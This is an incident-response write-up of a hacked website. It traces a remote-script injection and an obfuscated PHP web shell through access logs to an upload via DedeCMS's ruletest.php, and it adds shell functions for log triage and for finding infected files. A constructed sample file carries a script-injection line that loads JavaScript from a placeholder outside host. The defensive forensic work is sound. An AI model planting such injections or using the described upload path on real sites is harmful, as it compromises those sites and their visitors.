Visiting uchome.c1gstudio.com made Kaspersky report a trojan; NOD32 and Norton showed nothing.

Finding the injection

With IE8's developer tools plus HttpWatch the injected request was visible; with IE6, IE7 plus Fiddler2, and Firefox 2 and 3 plus Firebug the request could not be found.
The request address was (the real address is hidden; this is only an example):
http://xxx.xxxw3.com/a.js
The request does not appear in the homepage's source, but it shows up in a DOM inspector.
I made a temporary HTML file, pasted the homepage source into it, and by adding and removing code narrowed the trojan down to /source/script_common.js.
Over FTP the file on the server turned out to have been modified, with the following request code on its first line:
document.writeln("
Under uchome.c1gstudio.com/ there was also a very suspicious x.php.
Downloaded, it was obfuscated; decoded, it was the "Black Wolf PHP trojan" (黑狼PHP木马).
The file's upload date was 2009/04/20.
Searching showed the same file in the root directories of other domains as well; I renamed it immediately so the attacker could no longer reach it.
find /opt/htdocs -name 'x.php' -print

How did the attacker get the trojan onto the server?
Search the recent web access logs to see what the attacker did.
cat /opt/nging/logs/uchome.c1gstudio.com.log | grep /x.php
With the attacker's IP in hand, search the log for that IP:
cat /opt/nging/logs/uchome.c1gstudio.com.log | grep 125.70.209.110
125.70.209.110 - - [20/Apr/2009:10:12:16 +0800] "GET / HTTP/1.1" 200 5129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [20/Apr/2009:10:12:17 +0800] "GET / HTTP/1.1" 200 5130 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [20/Apr/2009:10:12:22 +0800] "-" 400 0 "-" "-" -
125.70.209.110 - - [20/Apr/2009:10:12:35 +0800] "GET //x.php HTTP/1.1" 200 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [20/Apr/2009:10:12:35 +0800] "GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
The trojan had already been uploaded by then, so check an earlier date:
cat /opt/nging/logs/uchome.c1gstudio.com.20090419.log | grep 125.70.209.110
125.70.209.110 - - [19/Apr/2009:19:25:01 +0800] "GET /../admin/index.asp HTTP/1.1" 400 170 "-" "-" -
125.70.209.110 - - [19/Apr/2009:19:25:09 +0800] "GET /../admin/default.asp HTTP/1.1" 400 170 "-" "-" -
125.70.209.110 - - [19/Apr/2009:19:25:12 +0800] "GET /../admin/manage.asp HTTP/1.1" 400 170 "-" "-" -
125.70.209.110 - - [19/Apr/2009:19:40:01 +0800] "GET / HTTP/1.1" 200 5234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:40:48 +0800] "GET /do.php?ac=sendmail&rand=1240141201 HTTP/1.1" 200 35 "http://uchome.c1gstudio.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:40:48 +0800] "GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:42:35 +0800] "GET /includes/class.Member.php HTTP/1.1" 404 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:42:36 +0800] "GET /favicon.ico HTTP/1.1" 304 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:42:45 +0800] "GET /includes/ HTTP/1.1" 404 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:42:46 +0800] "GET /favicon.ico HTTP/1.1" 304 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:43:19 +0800] "GET / HTTP/1.1" 200 5236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:43:27 +0800] "GET /do.php?ac=sendmail&rand=1240141399 HTTP/1.1" 200 35 "http://uchome.c1gstudio.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:43:28 +0800] "GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:44:17 +0800] "GET /x.php HTTP/1.1" 404 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:44:17 +0800] "GET /favicon.ico HTTP/1.1" 304 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
Here the attacker is scanning the site but has not yet uploaded x.php, so it was probably not uploaded through this domain.
Try another domain:
125.70.209.110 - - [19/Apr/2009:19:25:36 +0800] "GET /DB%23steer/DBBACK/[email protected] HTTP/1.1" 404 3864 "-" "Mozilla/4.0" -
125.70.209.110 - - [19/Apr/2009:19:25:38 +0800] "GET //guanli/ HTTP/1.1" 302 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:25:38 +0800] "GET //guanli/login.php?gotopage=%2F%2Fguanli%2F HTTP/1.1" 200 984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:25:42 +0800] "GET //include/vdimgck.php HTTP/1.1" 200 1304 "http://file.c1gstudio.com//guanli/login.php?gotopage=%2F%2Fguanli%2F" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:25:44 +0800] "GET /favicon.ico HTTP/1.1" 404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:25:51 +0800] "GET //guanli/ruletest.php HTTP/1.1" 200 1152 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:25:52 +0800] "GET /favicon.ico HTTP/1.1" 404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:25:59 +0800] "POST //guanli/ruletest.php HTTP/1.1" 200 48 "http://file.c1gstudio.com//guanli/ruletest.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:26:02 +0800] "GET //guanli/yhs.php HTTP/1.1" 200 35 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:26:03 +0800] "GET /favicon.ico HTTP/1.1" 404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:26:11 +0800] "GET /guanli/yhs.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2536 "http://file.c1gstudio.com//guanli/yhs.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:26:11 +0800] "GET /guanli/yhs.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2158 "http://file.c1gstudio.com//guanli/yhs.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:26:11 +0800] "POST //guanli/yhs.php HTTP/1.1" 200 8617 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:26:13 +0800] "POST //guanli/yhs.php HTTP/1.1" 200 77 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:26:40 +0800] "POST //guanli/yhs.php HTTP/1.1" 200 53 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:26:47 +0800] "GET //guanli/x.php HTTP/1.1" 200 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:26:48 +0800] "GET /favicon.ico HTTP/1.1" 404 1803 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:26:51 +0800] "POST //guanli/x.php HTTP/1.1" 200 159 "http://file.c1gstudio.com//guanli/x.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
125.70.209.110 - - [19/Apr/2009:19:26:54 +0800] "GET /guanli/x.php HTTP/1.1" 200 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)" -
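As an added example (my own, not the post's commands), the log triage above reduced to a few shell functions run against a constructed sample log. The sample is built from the entries quoted in the post, with user-agent strings shortened, plus one benign client (10.0.0.5) that is invented; the function names are this example's own.

```shell
#!/bin/sh
# Added example. Sample log is constructed from the post's entries
# (UA strings shortened) plus an invented benign client, 10.0.0.5.

write_sample_log() {
  log=$(mktemp)
  cat > "$log" <<'EOF'
125.70.209.110 - - [19/Apr/2009:19:25:01 +0800] "GET /../admin/index.asp HTTP/1.1" 400 170 "-" "-"
125.70.209.110 - - [19/Apr/2009:19:25:51 +0800] "GET //guanli/ruletest.php HTTP/1.1" 200 1152 "-" "Mozilla/4.0"
125.70.209.110 - - [19/Apr/2009:19:25:59 +0800] "POST //guanli/ruletest.php HTTP/1.1" 200 48 "http://file.c1gstudio.com//guanli/ruletest.php" "Mozilla/4.0"
125.70.209.110 - - [19/Apr/2009:19:26:02 +0800] "GET //guanli/yhs.php HTTP/1.1" 200 35 "-" "Mozilla/4.0"
125.70.209.110 - - [19/Apr/2009:19:26:11 +0800] "POST //guanli/yhs.php HTTP/1.1" 200 8617 "-" "Mozilla/4.0"
125.70.209.110 - - [19/Apr/2009:19:26:47 +0800] "GET //guanli/x.php HTTP/1.1" 200 444 "-" "Mozilla/4.0"
125.70.209.110 - - [19/Apr/2009:19:26:51 +0800] "POST //guanli/x.php HTTP/1.1" 200 159 "http://file.c1gstudio.com//guanli/x.php" "Mozilla/4.0"
10.0.0.5 - - [19/Apr/2009:19:30:00 +0800] "GET / HTTP/1.1" 200 5234 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Apr/2009:19:30:01 +0800] "GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/5.0"
EOF
  echo "$log"
}

# Combined-format fields: $1 is the client IP, $4 the "[time" token; the
# request line is the second double-quoted field, the status follows it.

# Distinct client IPs that ever requested a URI containing the given string
# (the post's grep /x.php, but returning only the IPs).
clients_for_uri() {  # $1 log, $2 URI substring
  awk -v pat="$2" '
    { split($0, q, "\""); split(q[2], r, " ") }
    index(r[2], pat) { print $1 }' "$1" | sort -u
}

# Chronological trail of one IP: time, method, URI, status.
trail_for_ip() {  # $1 log, $2 IP
  awk -v ip="$2" '$1 == ip {
    split($0, q, "\""); split(q[2], r, " "); split(q[3], s, " ")
    print substr($4, 2), r[1], r[2], s[1] }' "$1"
}

# Time of the first 2xx hit on a URI. For an uploaded shell this bounds when
# the file appeared, which is more trustworthy than its mtime.
first_success() {  # $1 log, $2 URI substring
  awk -v pat="$2" '{
    split($0, q, "\""); split(q[2], r, " "); split(q[3], s, " ")
    if (index(r[2], pat) && s[1] ~ /^2/) { print substr($4, 2); exit } }' "$1"
}

# Everything one IP POSTed before its first request to the shell: the
# candidate upload endpoint. On the sample it surfaces ruletest.php.
posts_before() {  # $1 log, $2 IP, $3 shell URI substring
  awk -v ip="$2" -v pat="$3" '$1 == ip {
    split($0, q, "\""); split(q[2], r, " ")
    if (index(r[2], pat)) exit
    if (r[1] == "POST") print r[2] }' "$1"
}
```

On a real log, run clients_for_uri for the shell's name, feed the IP it returns to trail_for_ip, let first_success date the shell's arrival, and read posts_before for what that client POSTed before the shell first answered; the upload endpoint is normally in that short list.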
Attack method

The attacker used //guanli/ruletest.php to upload yhs.php, and through it uploaded the x.php trojan;
x.php was then used to plant code into files.

System vulnerability

ruletest.php is a security vulnerability in DedeCMS.
Finding infected files

Check whether the web directory contains injected script:
find /opt/htdocs -name "*.js" -exec grep -I -l "w3.com" {} \;
find /opt/htdocs -name "*.htm" -exec grep -I -l "w3.com" {} \;
find /opt/htdocs -name "*.html" -exec grep -I -l "w3.com" {} \;
find /opt/htdocs -name "*.php" -exec grep -I -l "w3.com" {} \;
Check whether the web directory still holds backdoors:
find /opt/htdocs -name "x.php" -print
Files modified recently (a backdoor can set a file's modification time itself, so this check is unreliable):
find /opt/htdocs -mtime -1 -type f -exec ls -l {} \;
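An added example (mine, not the post's) that packages the three searches above into functions and runs them against a constructed web root: the clean page, the injected first line of script_common.js, the placeholder x.php and the directory layout are all made up for the demonstration. It also adds the check the mtime caveat calls for: inode change time (-ctime), which the kernel updates on every write or metadata change and which touch or utime() cannot set, so a backdated file still shows up.

```shell
#!/bin/sh
# Added example. The web root below is constructed for the demonstration.

make_sample_webroot() {
  root=$(mktemp -d)
  mkdir -p "$root/source" "$root/guanli"
  printf '<html><body>clean page</body></html>\n' > "$root/index.html"
  # constructed stand-in for the injected first line the post describes
  printf 'document.writeln("<script src=http://xxx.xxxw3.com/a.js></script>");\nvar site = "uchome";\n' \
    > "$root/source/script_common.js"
  # constructed placeholder, not a real shell: only the filename matters here
  printf '<?php /* placeholder standing in for the obfuscated shell */ ?>\n' > "$root/guanli/x.php"
  echo "$root"
}

# 1) Web-facing file types that reference the injected host. Quoting the
#    globs keeps the shell from expanding them before find sees them.
find_injected() {  # $1 webroot, $2 marker string (here the injected domain)
  find "$1" -type f \( -name '*.js' -o -name '*.htm' -o -name '*.html' -o -name '*.php' \) \
       -exec grep -I -l -- "$2" {} \; | sort
}

# 2) A known backdoor filename anywhere under the root.
find_named_backdoors() {  # $1 webroot, $2 filename
  find "$1" -type f -name "$2" | sort
}

# 3a) The post's check: modification time, which a shell can rewrite.
find_recently_modified() {  # $1 webroot, $2 days
  find "$1" -type f -mtime "-$2" | sort
}

# 3b) Inode change time. Set by the kernel on every write or metadata change;
#     touch and utime() cannot alter it, so backdating mtime does not hide a
#     file from this search (only clock tampering or raw disk edits do).
find_recently_changed() {  # $1 webroot, $2 days
  find "$1" -type f -ctime "-$2" | sort
}
```

Run both time-based searches and diff them: a file that appears only in the ctime list has had its mtime pushed into the past, which is itself a finding.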
The attacker had inserted several injections into most of the html, js and php files; even 404.htm had one.
Several renamed trojans had been uploaded into different directories, and upload code had been planted into the original program files.

Remediation

Because the infection was so widespread, the original web directory was removed and the files re-uploaded.
Delete the dede backend.
Change the MySQL, host, web and other administrative passwords.